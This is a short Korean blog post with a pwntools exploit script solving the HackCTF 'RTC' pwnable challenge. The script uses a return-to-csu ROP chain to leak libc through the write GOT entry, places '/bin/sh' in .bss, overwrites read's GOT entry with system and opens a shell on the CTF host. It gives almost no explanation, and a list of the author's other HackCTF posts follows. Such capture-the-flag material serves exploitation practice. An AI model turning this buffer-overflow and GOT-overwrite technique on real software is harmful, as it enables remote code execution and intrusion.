ii4gsp
HackCTF - RTC 본문
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3025)
e = ELF('./rtc')
libc = ELF('./libc.so.6')
binsh = '/bin/sh\x00'
bss = e.bss()
stage0 = 0x00000000004006ba
stage1 = 0x00000000004006a0
def exploit(addr, arg1, arg2, arg3):
payload = ''
payload += p64(0)
payload += p64(1)
payload += p64(addr)
payload += p64(arg3)
payload += p64(arg2)
payload += p64(arg1)
payload += p64(stage1)
return payload
payload = ''
payload += '\x90' * 0x48
payload += p64(stage0)
payload += exploit(e.got['write'], 1, e.got['read'], 8)
payload += '\x90' * 8
payload += exploit(e.got['read'], 0, bss, len(binsh))
payload += '\x90' * 8
payload += exploit(e.got['read'], 0, e.got['read'], 8)
payload += '\x90' * 8
payload += exploit(e.got['read'], bss, 0, 0)
r.recvuntil('\n')
r.sendline(payload)
libc_base = u64(r.recv(8)) - libc.symbols['read']
system = libc_base + libc.symbols['system']
payload = ''
payload += binsh
payload += p64(system)
r.sendline(payload)
r.interactive()
'시스템 해킹 > HackCTF' 카테고리의 다른 글
HackCTF - Register (0) | 2020.11.27 |
---|---|
HackCTF - Unexploitable #2 (0) | 2020.11.26 |
HackCTF - SysROP (0) | 2020.05.05 |
HackCTF - Unexploitable #1 (0) | 2020.05.05 |
HackCTF - You are silver (0) | 2020.03.05 |
Comments